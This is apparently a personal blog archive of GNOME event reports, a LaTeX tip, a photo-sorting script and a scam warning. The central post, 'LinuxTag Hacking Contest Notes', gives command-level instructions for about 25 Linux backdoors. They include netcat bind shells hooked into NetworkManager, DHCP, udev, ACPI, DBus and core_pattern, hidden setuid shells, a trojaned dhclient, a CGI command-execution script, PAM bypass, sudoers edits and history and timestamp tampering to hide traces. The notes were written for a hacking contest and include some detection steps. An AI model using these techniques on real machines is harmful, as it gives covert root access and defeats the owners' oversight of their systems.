LinuxCon Japan 2011

Thanks to the Linux Foundation I was able to attend LinuxCon 2011 in Japan.

I used the opportunity to distribute GNOME 3 DVD Images and leaflets during my talk about GNOME 3 which was well enough received I’d say. While I collected a lot of experience approaching people and telling them about all the niceties that GNOME 3 offers over the last few month, I really had too little time to tell all the brilliant things about our new GNOME. Anyway, it was nice to be on the very same schedule as the very important Linux people like Greg KH, Linus or Lenny.

The conference itself was hosted in a very spacious building: The Pacifico in Yokohama. One could see that impressive building from our hotel room. Just nice. The conference was well organised and the provided amenities such as food and drinks were good enough. I was particularly impressed by the simultaneous translations that were done by two elderly men.

The talks were generally interesting, probably because I haven’t been to a kernel focused conference and I found it interesting to get new input. My favourites were the Kernel Developer Panel were one could pose question onto the Kernel people face to face and the talks about the social aspect of Kernel development.

Despite all the trouble in Japan, we had a very good time and in fact, there weren’t many indicators to the earthquake or the nuclear catastrophe. The most annoying inconveniences probably were the turned off elevators. Other than that, we didn’t really see any disrupted services or chaos or problems at all. Traveling in Japan is a real pleasure as the train system is gorgeous and the cities are very well mapped. You encounter a city map just about every other corner and it’s very detailed and helpful. Japanese people are extraordinarily friendly and although there is a language barrier, they try to understand and help you. The downside is, that Japan is quite expensive. Especially the train system, but also lodging and food. However, the quality is very good, so it’s probably worth the money.

I’m looking forward to attend the next LinuxCon, maybe even in Japan 🙂

LinuxTag Hacking Contest Notes

As I wrote the other day, I have been to LinuxTag in Berlin. And Almost like last year a Hacking contest took place.

LinuxTag 2011 - Hacking Contest

The rules were quite the same: Two teams play against each other, each team having a laptop. The game has three rounds of 15 minutes each. In the first round the teams swap their laptops so that you have the opponents machine. You are supposed to hide backdoors and other stuff. In the second round the laptops are swapped back and you have to find and remove these backdoors. For the third round the laptops are swapped once again and you can show off what backdoors were left in the system.

So preparation seems to be the obvious key factor for winning. While I did prepare some notes, they turned out to not be very good for the actual contest, because they are not structured well enough.

Since the game has three rounds, it makes sense to have a structure with three parts as well. Hence I produced a new set of notes with headlines for each backdoor and three parts per section. Namely Hacking, Fixing and Exploiting.

The notes weren’t all ready just before the contest and hence we didn’t score pretty well. But I do think that our notes are quite cool by now though. Next time, when we’re more used to the situation and hopefully learned through suffering to not make all those tiny mistakes we did, we might play better.

So enjoy the following notes and feel free to give feedback.

Set Keyboard to US English:

setxkbmap us
export HISTFILE=/dev/null
ln -sf ~/.bash_history /dev/null
ln -sf ~/.viminfo /dev/null

while true; do find / -exec touch {} \; ; sleep 2; done


1  passwd new user

Remote
root


1.1  Hacking

nano /etc/passwd

copy and paste root user to a new user, i.e. hackr.

sudo passwd hackr


1.2  Fixing

grep :0: /etc/passwd


1.3  Exploiting

ssh hackr@localhost


2  dePAMify

Remote
root


2.1  Hacking

cd /lib/security/
cp pam_permit.so pam_deny.so
echo > /etc/pam.d/sshd
/etc/init.d/sshd restart


2.2  Fixing

too hard


2.3  Exploiting

ssh root@localhost

enter any password


3  NetworkManager

Remote
root


3.1  Hacking

nano /etc/NetworkManager/dispatcher.d/01ifupdown <<EOF
nc.traditional -l -p 31346 -e /bin/bash &
cp /bin/dash /etc/NetworkManager/dhclient
chmod +s /etc/NetworkManager/dhclient
EOF


3.2  Fixing

ls /etc/NetworkManager/dispatcher.d/


3.3  Exploiting

less /etc/NetworkManager/dispatcher.d/

Disconnect Network via NetworkManager

Connect Network via NetworkManager

/etc/NetworkManager/dhclient

netcat localhost 31346


4  SSHd

Remote
root


4.1  Hacking

su -
ssh-keygen
cd
cat .ssh/id_rsa.pub | tee /etc/ssh/authorized_keys
cat .ssh/id_rsa | tee /etc/issue.net
cp /etc/ssh/sshd_config /tmp/
nano /etc/ssh/sshd_config <<EOF
AuthorizedKeysFile /etc/ssh/authorized_keys
Banner /etc/issue.net
EOF

/etc/init.d/ssh reload
mv /tmp/sshd_config /etc/ssh/


4.2  Fixing

less /etc/ssh/sshd_config

/etc/init.d/ssh reload


4.3  Exploiting

ssh root@localhost 2> /tmp/root
chmod u=r,go= $_
ssh  -i /tmp/root root@localhost


5  xinetd

Remote
root


5.1  Hacking

cp  /etc/xinetd.d/chargen  /etc/xinetd.d/chargen.bak

nano /etc/xinetd.d/chargen <<EOF

disable = no
DELETE type = INTERNAL
server = /bin/dash
EOF

/etc/init.d/xinetd restart

mv /etc/xinetd.d/chargen.bak  /etc/xinetd.d/chargen


5.2  Fixing

grep disable  /etc/xinetd.d/* | grep no


5.3  Exploiting

nc localhost chargen


6  Apache

Remote
root

Needs testing


6.1  Hacking

nano /etc/apache2/sites-enabled/000-default

DocumentRoot /
Make <Directory />  and copy allowance from below

/etc/init.d/apache2 restart

touch /usr/lib/cgi-bin/fast-cgid
chmod a+rwxs $_
touch /usr/lib/cgi-bin/fast-cgid.empty
chmod a+rwxs $_
nano /usr/lib/cgi-bin/fast-cgid <<EOF
    #!/bin/bash
    IFS=+
    $QUERY_STRING
EOF

nano /etc/sudoers <<EOF
www-data ALL=NOPASSWD: ALL
EOF


6.2  Fixing

ls -l /usr/lib/cgi-bin/

nano /etc/apache2/sites-enabled/*

/etc/init.d/apache2 restart


6.3  Exploiting

links2 http://localhost/  # Remote file access
links2 http://localhost/cgi-bin/fast-cgid?id # Remote command execution
grep NOPASS /etc/sudoers  # local privilege escalation
links2 http://localhost/cgi-bin/fast-cgid?sudo+id # Remote root command execution

nano /usr/lib/cgi-bin/fast-cgid.empty <<EOF
/bin/dash
EOF

/usr/lib/cgi-bin/fast-cgid.empty # local privilege escalation


7  screen

Local
root


7.1  Hacking

sudo chmod u+s /bin/dash
sudo mkdir -p /etc/screen.d/user/
sudo chmod o+rwt /etc/screen.d/user/
# NOW AS USER!!1
SCREENDIR=/etc/screen.d/user/ screen
# IN THE SCREEN
dash
C-d


7.2  Fixing

ls -l /var/run/screen
rm -rf /var/run/screen/*

sudo lsof | grep -i screen | grep FIFO
rm these files


7.3  Exploiting

SCREENDIR=/etc/screen.d/user/ screen -x


8  hidden root dash

Local
root


8.1  Hacking

cp /bin/dash /usr/bin/pkexec.d
chmod +s !$
cp /bin/dash /etc/init.d/powersaved
chmod +s !$


8.2  Fixing

find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} \;

rm these files


8.3  Exploiting

/etc/init.d/powersaved

/usr/bin/pkexec.d


9  DHCP Hook

Local
Remote
root


9.1  Hacking

nano /etc/dhcp3/dhclient-exit-hooks.d/debug <<EOF
nc.traditional -l -p 31347 &
cp /bin/dash /var/run/dhclient
chmod +s /var/run/dhclient
EOF


9.2  Fixing

ls -l /etc/dhcp3/dhclient-exit-hooks.d/
ls -l /etc/dhcp3/dhclient-enter-hooks.d/


9.3  Exploiting

Reconnect Network via DHCP

/var/run/dhclient

netcat localhost 31347


10  ConsoleKit

Local
root

Switchen VTs is triggered locally only, although one might argue that switching terminals is done every boot. Hence it’s kinda automatic.


10.1  Hacking

sudo -s
touch /usr/lib/ConsoleKit/run-seat.d/run-root.ck
chmod a+x /usr/lib/ConsoleKit/run-seat.d/run-root.ck
nano /usr/lib/ConsoleKit/run-seat.d/run-root.ck

#!/bin/sh

chmod u+s /bin/dash
nc.traditional -l -p 31337 -e /bin/dash &


10.2  Fixing

ls /usr/lib/ConsoleKit/run-seat.d/

Only one symlink named udev-acl.ck is supposed to be there.


10.3  Exploiting

ls /usr/lib/ConsoleKit/run-seat.d/

Switch TTY (Ctrl+Alt+F3)

execute /bin/dash

nc IP 31337


11  SIGSEGV

Local
root


11.1  Hacking

echo '|/bin/nc.traditional -l -p 31335 -e /bin/dash' > /proc/sys/kernel/core_pattern


11.2  Fixing

cat /proc/sys/kernel/core_pattern
echo core > /proc/sys/kernel/core_pattern


11.3  Exploiting

ulimit -c unlimited

sleep 1m & pkill -SEGV sleep

nc localhost 31335


12  nc wrapper

Remote
Local
root


12.1  Hacking

setxkbmap us
cd /tmp/
cat > dhclient.c <<EOF
#include <unistd.h>

int main (int argc, char* args[]) {
    int ret = fork ();
    if (ret == 0) {
        chmod("/bin/dash", 04755);
        execlp ("/usr/bin/nc.traditional", "nc.traditional",
            "-l" ,"-p", "31339", "-e", "/bin/dash", (char*) NULL);
    } else
        execvp("/sbin/dhclient6", args);
    return 0;
}
EOF

/etc/init.d/networking stop                # Or disable via NotworkManager
make dhclient
cp /sbin/dhclient /sbin/dhclient6
cp dhclient /sbin/dhclient
cp dhclient /etc/cron.hourly/ntpdate
cp dhclient /sbin/mount.btrfs
cp dhclient /usr/lib/cgi-bin/cgi-handler
chmod ug+s /sbin/mount.btrfs /usr/lib/cgi-bin/cgi-handler
rm dhclient.c
/etc/init.d/networking start               # Or enable via NotworkManager


12.2  Fixing


12.3  Exploiting


12.3.1  real dhclient

Disconnect with Network Manager

Connect with NetworkManager

dash

nc localhost 31339


12.3.2  cron

Just wait. Or reboot.


13  evbug

Remote

Writes Keycodes to syslog.
Type: 1 are keypresses, and “code” is the actual keycode.
evtest shows which key maps to which keycode.

Unfortunately, Debian does not seem to have that module.


13.1  Hacking

modprobe evbug
%FIXME: Maybe pull netconsole

nano /etc/modprobe.d/blacklist.conf


13.2  Fixing

modprobe -r evbug


13.3  Exploiting

dmesg | grep  "Type: 1"


14  Vino

Remote


14.1  Hacking

sudo -s
xhost +
nohup /usr/lib/vino/vino-server &
vino-preferences


14.2  Fixing

vino-preferences

ps aux | grep vnc


14.3  Exploiting

vncviewer IP


15  GDM InitScript

Local
Remote
root


15.1  Hacking

nano /etc/gdm/Init/Default <<EOF
cp /bin/dash /etc/gdm/gdm-greeter
chmod +s /etc/gdm/gdm-greeter
nc.traditional -l -p 31345 -e /bin/dash &
EOF


15.2  Fixing

less /etc/gdm/Init/Default


15.3  Exploiting

Log off

Log on

/etc/gdm/gdm-greeter

nc localhost 31345


16  shadow a+rw

Local
root


16.1  Hacking

chmod a+rw /etc/shadow


16.2  Fixing

ls -l /etc/shadow

chmod u=rw,g=r /etc/shadow


16.3  Exploiting

nano /etc/shadow


17  SysV Init Alt+Up

Local
root


17.1  Hacking

touch /etc/init.d/throttle
chmod a+x $_
nano $_ <<EOF
#!/bin/sh
exec </dev/tty13 >/dev/tty13 2>/dev/tty13
exec /bin/bash
EOF

nano /etc/inittab <<EOF
kb::kbrequest:/etc/init.d/throttle
EOF

init q


17.2  Fixing

nano /etc/inittab


17.3  Exploiting

Ctrl+Alt+F1, Alt+Up, Alt+Left


18  SysV Init Ctrl+Alt+Del

Local
root


18.1  Hacking

nano /etc/inittag <<EOF
ca:12345:ctrlaltdel:chmod +s /bin/dash
EOF

init q


18.2  Fixing

nano /etc/inittag


18.3  Exploiting

Ctrl+Alt+F1, Ctrl+Alt+Del, dash


19  SysV Init tty14

Local
root


19.1  Hacking

nano /etc/inittag <<EOF
14:23:respawn:/bin/login -f root </dev/tty14 >/dev/tty14 2>/dev/tty14
EOF

init q


19.2  Fixing

less /etc/inittag


19.3  Exploiting

Ctrl+Alt+F1, Alt+Left


20  DBus Root Service

Local
root


20.1  Hacking

cd /usr/share/dbus-1/system-services/
cp org.freedesktop.org.UPower org.Rootme.Remotely.service
nano org.Rootme.Remotely.service << EOF
[D-BUS Service]
Name=org.Rootme.Remotely
Exec=/bin/nc.traditional -l -p 31343 -e /bin/dash
User=root
EOF

cp org.freedesktop.org.UPower org.Rootme.Locally.service
nano org.Rootme.Locally.service << EOF
[D-BUS Service]
Name=org.Rootme.Locally
Exec=/bin/chmod u+s /bin/dash
User=root
EOF


20.2  Fixing

grep Exec /usr/share/dbus-1/system-services/*.service


20.3  Exploiting

dbus-send -system -print-reply -dest='org.Rootme.Locally' /org/Rootme/Locally org.Rootme.Locally

dbus-send -system -print-reply -dest='org.Rootme.Remotely' /org/Rootme/Remotely org.Rootme.Remotely

nc localhost 31343

dash


21  Crontabs

Local
Remote
root


21.1  Hacking

touch /etc/cron.d/pamd
chmod a+x /etc/cron.d/pamd
nano /etc/cron.d/pamd <<EOF
*/2 * * * *   root  cp /bin/dash /usr/share/gdm/chooser
*/2 * * * *   root  chmod +s /usr/share/gdm/chooser
EOF

touch /etc/cron.d/dhclient
chmod a+x /etc/cron.d/dhclient
nano /etc/cron.d/dhclient <<EOF
*/2 * * * *   root  /sbin/mount.btrfs
EOF


21.2  Fixing

sudo ls -l /var/spool/cron/crontabs/ /etc/cron.*/


21.3  Exploiting

ls -l /etc/cron.d/dhclient /etc/cron.d/pamd /usr/share/gdm/chooser

Wait

/usr/share/gdm/chooser

nc -l localhost 31339


22  udev

Localroot

udev is responsible for devices being attached to Linux.
It is able to trigger commands on certain hardware.
Under the assumption that a Laptop will have a rfkill switch, one could write the following rules.
Note that the commands block, i.e. to hit the second rule, the first program must exist.
udev automatically reloads the rules.


22.1  Hacking

nano /lib/udev/rules.d/99-rfkill.rules <<EOF
SUBSYSTEM=="rfkill", RUN +="/bin/nc.traditional -l -p 31337 -e /bin/sh"
SUBSYSTEM=="rfkill", RUN +="/bin/chmod +s /bin/dash"
EOF


22.2  Fixing

grep RUN /lib/udev/rules.d/* /etc/udev/rules.d/

but too hard


22.3  Exploiting

toggle rfkill via hardware switch

nc localhost 31344

dash


23  ACPI Powerbtn

Local
root


23.1  Hacking

nano /etc/acpi/powerbtn.sh <<EOF
nc.traditional -l -p 31348 -e /bin/sh
/bin/chmod +s /bin/dash
EOF


23.2  Fixing

ls /etc/acpi/

less /etc/acpi/powerbtn.sh


23.3  Exploiting

Press power button

nc localhost 31348

dash


24  PolicyKit GrantAll

Local
root

Note that this reflects policykit 0.96 which has a deprecated config file syntax.


24.1  Hacking

nano /usr/share/polkit-1/actions/org.freedesktop.policykit.policy

change org.freedesktop.policykit.exec to read
    <defaults>
      <allow_any>yes</allow_any>
      <allow_inactive>yes</allow_inactive>
      <allow_active>yes</allow_active>
    </defaults>

pkill polkitd


24.2  Fixing

nano /usr/share/polkit-1/actions/org.freedesktop.policykit.policy

change org.freedesktop.policykit.exec to read
      <allow_any>auth_admin</allow_any>
      <allow_inactive>auth_admin</allow_inactive>
      <allow_active>auth_admin</allow_active>

pkill polkitd


24.3  Exploiting

pkexec id


25  decoy timestamps

No hack in the traditional sense but stuff that one might need to do.


25.1  Hacking

for i in `find /etc/ /bin/ /sbin/ /var/spool/
          /var/run /usr/lib/ConsoleKit /usr/share/dbus-1/ /usr/share/polkit-1/`; do
    touch $i; done
export HISTFILE=/dev/null
rm ~/.*history*


25.2  Fixing


25.3  Exploiting

find / -mtime -1

find / -ctime -1

GNOME at LinuxTag 2011

Last week, I had the pleasure to attend LinuxTag and manage the GNOME booth. All in all, the GNOME booth went quite well. We had loads of visitors wanting to see the new GNOME Shell and discuss its design. But it was such a busy time that I didn’t even had the opportunity to leave the booth and look at all the other projects. It was, however, pretty nice. It took me a day to recover though. Being at the booth for all the four conference days in a row from (ideally) 09:00 until 18:00, always smiling and entertaining was quite exhausting.

To help the GNOME presence: I printed flyers and posters all day before LinuxTag. It was a pain to do, because we are lacking good material. We do have some Brochures to print out, but they are either outdated or in a miserable quality. It definitely needs some quality brochures for GNOME. We have more Posters and some of them are really nice. But I couldn’t render some of them because of bugs somewhere in the stack. Anyway, I managed to print posters on A4 paper which meant that they had to be glued together… To ease poster printing in the future, I uploaded the PDFs I generated to the wiki.

What worked well was our booth setup: We had Posters, Sticker, Flyers and (thanks to openSuSE) GNOME 3 Live DVDs to give away. Also our booth looked nice with GNOME banners hanging from the walls. Also, the ordered furniture looked nice to the outside, i.e. a presenter desk, a long cupboard and a bar table together with bar chairs made it look inviting. However, we lacked a small table and some chairs to cater for the many friends that were in the booth and not in front. Thanks to all the helping people. It was really awesome how quickly our booth looked nicely.

And fortunately, there is room for improvement. It would have been nice if we brought, i.e. T-Shirts to sell or Posters and Flyers for the GUADEC. But everything was still really okay. I hope we manage to do so well next year, too.

So thanks to Canonical for the EventsBox and openSuSE for the DVDs! If you happen to be in the need of some of the DVDs, give me a shout and we’ll arrange the shipping.

GNOME3 Release Parties

Oh, I almost forgot about the GNOME 3 Release Party that we had the other week. In fact, I had two times the pleasure of showing off GNOME 3 to the people. The first and official Release Party was held in the Attraktor. We even got mentioned by Heise. The second time was in my university during a self organised seminar.

On both occasions, I had to entertain a good bunch of people (around 15 and 30) and, well, it went at least alrightish, I’d say 😉 The second time was a bit confusing, because my Laptop didn’t want to as perform well as I expected so a good bit of improvisation was needed. But it was great fun overall. The goodies, that were provided by the GNOME Foundation, were well received, esp. the T-Shirts.

I showed off the really brilliantly done videos that Jason produced. We demoed and discussed those features and discovered even more stuff on the way. I haven’t really worked much with GNOME3, esp. GNOME Shell before and it’s kinda awkward in the beginning, but I got used to it very quickly. I really like much of it now.

Thanks to the Attraktor for having hosted us. And thanks to the attendees for the nice discussions. I’m looking forward to do some more GNOME3 presentations at coming LinuxTag and other occasions.

Happy GNOME3 everybody!

I am GNOME

Perfectly scale an image to the rest of a page with LaTeX

I had the following problem for a long time: I wanted to embed a picture into a page and automatically have it scaled to the maximum size that possibly fits the page, but not more. Obviously, simply doing a

\includeimage[width=\textwidth]{myimage}

wouldn’t do the job, because if the image is more tall than wide, the image would grow beyond the page. One could use the information from the \textheigth register, i.e. like

\includeimage[width=\textwidth,height=\textheight,keepaspectration=true]{myimage}

But that doesn’t take already existing text into account, i.e. some description above the image that you definitely want to have on the same page.

So Simon cooked up a macro that would allow me to do exactly what I wanted by creating a new box, getting its height and subtracting that from \textheight. Lovely. Here’s the code:

\newlength{\textundbildtextheight}
 
\newcommand{\textundbild}[2]{
\settototalheight\textundbildtextheight{\vbox{#1}}
#1
\vfill
\begin{center}
\includegraphics[width=\textwidth,keepaspectratio=true,height=\textheight-\the\textundbildtextheight]{#2}
\end{center}
\vfill
}

I’m sure it’s not very correct and it’s possible to make it not work properly, but it does the job very well for me as you can see on the following rendered pages:


DIN A4 Page
DIN A5 Page
DIN A6 Page

And well, the contents of the image is a bit ugly, too, but if you know a nice bullshit bingo generator, let me know.

RFID Workshop at CampusGruen’s Datenschutzkongress

I was asked to give a workshop about RFID for the CampusGruen Datenschutzkongress in Hamburg. So I did 🙂

I used the opportunity to introduce the audience to the basics of RFID, i.e. what technologies exist and what they are used for. Also, I took arguments from pro and anti RFID groups to have them discussed.

You can have a look at the slides altough I doubt that they make much sense without actually having heard what was to be said. We spend good two hours talking and discussing over my twenty-something slides. Thanks again to the interested audience.

Afterwards, we had a small hacking session. I brought some RFID readers, tags, a passport, etc. and we used all that to play around. We also scanned some wallets to find out whether anybody had unwanted chips in their wallet.

GNOME 3 Launch Party in Hamburg

For the new GNOME-3 love we will have a release party in Hamburg, just as many places over Germany and the whole world!

If you want to join the fun, be in the Attraktor, the local hackerspace. The address is Mexikoring 21, 22999 Hamburg, Germany, Europe, Earth, Solarsystem. Find more detailed instruction on how to get there here. The party starts on Friday, 2011-04-08, at 18:00 and runs open end.

We have a page in the local wiki to describe the event and further planning will take place there: http://wiki.attraktor.org/Termin:GNOME-3-Launch-Party. As for the program: We intend to have a small introductory talk to show off what new user experience GNOME-3 will bring to the people. Afterwards, we will distribute GNOME-3 images to be put on pendrives to be able try GNOME-3. Finally, we’ll sit around, have some beers and snacks and discuss about the new and shiny GNOME 🙂

Besides the GNOME-3 images, we’ll have GNOME-3 goodies to give away! Thanks a lot to the GNOME Foundation making that possible! So show up early to claim your goodies!

So I expect you to be there 🙂

“Schuelerbotendienst” auf Abzocktour in Hamburg

Gerade komm’ ich mit nem Kumpel aus der Innenstadt. Dort wurden wir von zwei jungen Menschen, die vielleicht gerade 20 waren, angesprochen, ob wir den “Schuelerbotendienst” kennen wuerden. Wir verneinten und es wurde uns erklaert, dass es sich um ein soziales Projekt handele, bei dem Hartz IV Kinder sich etwas dazu verdienen koennten, indem sie Zeitung austragen. Dazu muessten sie aber erst auf Zuverlassigkeit geprueft werden. Und dafuer braeuchten sie Freiwillige, die sich ein kostenloses Abo zuschicken lassen und die korrekte Lieferung bestaetigen wollen. Nach zwei Wochen (oder so) wuerde das Abo dann aufhoeren aber wenn man wollte, koenne man es verlaengern.

Es wirkte nicht direkt abwaegig. Und in der Tat war ich fast gewillt, mich darauf einzulassen. Aber auf der Strasse etwas unterschreiben wollte ich nicht. Ich wollte die zurueckrufen, sobald ich mich informiert habe. Aber der junge Mann konnte mir gar keine Nummer seines Schuelerbotendienstes geben. Sehr fishy. Also ging ich mit einem blanko Zettel nach Hause und studierte die Information. Die zu unterschreibende Botschaft hat weder den “Schuelerbotendienst” noch eine Kostenfreiheit erwaehnt. Im Gegenteil. Zwei Wochen lang solle man das Abo bekommen, aber ohne seine Bankdaten angeben zu muessen, lediglich auf Rechnung. Danach wuerde sich das Abo eben um ein Jahr (oder so) verlaengern.

Die Skepsis war also angebracht und die Masche mit dem sog. “Schuelerbotendienst” scheint auch nicht neu zu sein.

Die Abos, die die Betrueger an die Menschen bringen wollen, sind von dem VSR Verlag, der wohl schon laenger mit dubiosen Vertriebler zu kaempfen hat.

Also Augen auf und Sinne geschaerft bei einem komischen Verkaufsgespraech auf der Strasse. Sollte doch etwas unterschrieben worden sein, gleich die 14 Tage Widerspruchsfrist in Anspruch nehmen und etwaige Vertraege kuendigen.

Sifting through a lot of similar photos

To keep the amount of photos in my photo library sane, I had to sift through many pictures and get rid of redundant ones. I defined redundancy as many pictures taken at the same time. Thus I had to pick one of the redundant pictures and delete the other ones.

My strategy so far was to use Nautilus and Eye of GNOME to spot pictures of the same group and delete all but the best one.

I realised that photos usually show the same picture if they were shot at the same time, i.e. many quick shots after another. I also realised that usually the best photograph was the biggest one in terms on bytes in JPEG format.

To automate the whole selection and deletion process, I hacked together a tiny script that stupidly groups files in a directory according to their mtime and deletes all but the biggest one.

Before deletion, it will show the pictures with eog and ask whether or not to delete the other pictures.

It worked quite well and helped to quickly weed out 15% of my pictures 🙂

I played around with another method: Getting the difference of the histograms of the images, to compare the similarity. But as the pictures were shot with a different exposure, the histograms were quite different, too. Hence that didn’t work out very well. But I’ll leave it in, just for reference.

So if you happen to have a similar problem, feel free to grab the following script 🙂

#!/usr/bin/env python
 
import collections
import math
import os
from os.path import join, getsize, getmtime
import operator
import subprocess
import sys
 
 
 
 
subprocess.Popen.__enter__ = lambda self: self
subprocess.Popen.__exit__ = lambda self, type, value, traceback: self.kill()
 
directory = '.'
THRESHOLD = 3
GET_RMS = False
 
mtimes = collections.defaultdict(list)
 
def get_picgroups_by_time(directory='.'):
 
	for root, dirs, files in os.walk(directory):
		for name in files:
			fname = join(root, name)
			mtime = getmtime(fname)
			mtimes[mtime].append(fname)
 
	# It's gotten a bit messy, but a OrderedDict is available in Python 3.1 hence this is the manually created ordered list.
	picgroups = [v for (k, v) in sorted([(k, v) for k, v in mtimes.iteritems() if len(v) >= THRESHOLD])]
 
	return picgroups
 
def get_picgroups(directory='.'):
	return get_picgroups_by_time()
 
picgroups = get_picgroups(directory)
 
print 'Got %d groups' % len(picgroups)
 
def get_max_and_picgroups(picgroups):
	for picgroup in picgroups:
		max_of_group = max(picgroup, key=lambda x: getsize(x))
		print picgroup
		print 'max: %s: %d' % (max_of_group, getsize(max_of_group))
 
		if GET_RMS:
			import PIL.Image
			last_pic = picgroup[0]
			for pic in picgroup[1:]:
				image1 = PIL.Image.open(last_pic).histogram()
				image2 = PIL.Image.open(pic).histogram()
 
				rms = math.sqrt(reduce(operator.add, map(lambda a,b: (a-b)**2, image1, image2))/len(image1))
 
				print 'RMS %s %s: %s' % (last_pic, pic, rms)
 
			last_pic = pic
		yield (max_of_group, picgroup)
 
 
max_and_picgroups = get_max_and_picgroups(picgroups)
 
 
def decide(prompt, decisions):
	import termios, fcntl, sys, os, select
 
	fd = sys.stdin.fileno()
 
	oldterm = termios.tcgetattr(fd)
	newattr = oldterm[:]
	newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO
	termios.tcsetattr(fd, termios.TCSANOW, newattr)
 
	oldflags = fcntl.fcntl(fd, fcntl.F_GETFL)
	fcntl.fcntl(fd, fcntl.F_SETFL, oldflags | os.O_NONBLOCK)
 
	print prompt
 
	decided = None
	try:
		while not decided:
			r, w, e = select.select([fd], [], [])
			if r:
				c = sys.stdin.read(1)
				print "Got character", repr(c)
				decision_made = decisions.get(c, None)
				if decision_made:
					decision_made()
					decided = True
 
	finally:
	    termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)
	    fcntl.fcntl(fd, fcntl.F_SETFL, oldflags)
 
for max_of_group, picgroup in max_and_picgroups:
	cmd = ['eog', '-n'] + picgroup
	print 'Showing %s' % ', '.join(picgroup)
 
	def delete_others():
		to_delete = picgroup[:]
		to_delete.remove(max_of_group)
		print 'deleting %s' % ', '.join (to_delete)
		[os.unlink(f) for f in to_delete]
 
	with subprocess.Popen(cmd) as p:
		decide('%s is max, delete others?' % max_of_group, {'y': delete_others, 'n': lambda: ''})

GNOME @ FOSDEM 2011

I am very excited about having attended this years FOSDEM. Unfortunately, times were a bit busy so I am a bit late reporting about it, but I still want to state a couple of things.

I'm going to FOSDEM, the Free and Open Source Software Developers' European Meeting (I wonder how that image will look in 2012 😉 )

First of all, I am very happy that our GNOME booth went very well. Thanks to Frederic Peters and Frederic Crozat for manning to booth almost all the time. I tried to organise everything remotely and I’d say I partly succeeded. We got stickers, t-shirts and staff for the booth. We lacked presentation material and instructions for the booth though. But it still worked out quite well. For the next time, I’d try to be communicate more clearly who is doing what to prevent duplicate work and ensure that people know who is responsible for what.

Secondly, I’d like to thank Canonical for their generosity to sponsor a GNOME Event Box. After the orginal one went missing, Canocical put stuff like a PC, a projector, a monitor and lots of other stuff together for us to be able to show off GNOME-3. The old Box, however, turns out to be back again *yay*!

Sadly, we will not represent GNOME at upcoming CeBIT. But we will at LinuxTag. Latest.

Anyway, during FOSDEM, we got a lot of questions about GNOME 3 and Ubuntu, i.e. will it be easily possible to run GNOME 3 on Ubuntu. I hope we can make it possible to have a smooth transition from Unity to GNOME Shell. Interestingly enough, there isn’t a gnome-shell package in the official natty repositories yet 🙁

It was especially nice to see and talk to old GNOME farts. And I enjoyed socialising with all the other GNOME and non-GNOME people as well. Sadly, I didn’t like the GNOME Beer Event very much because it was very hot in the bar so I left very quickly.

So FOSDEM was a success for GNOME I’d say. Let’s hope that future events will work at least as well and that we’ll have a strong GNOME representation even after the GNOME 3 release.

Creative Commons Attribution-ShareAlike 3.0 Unported
This work by Muelli is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported.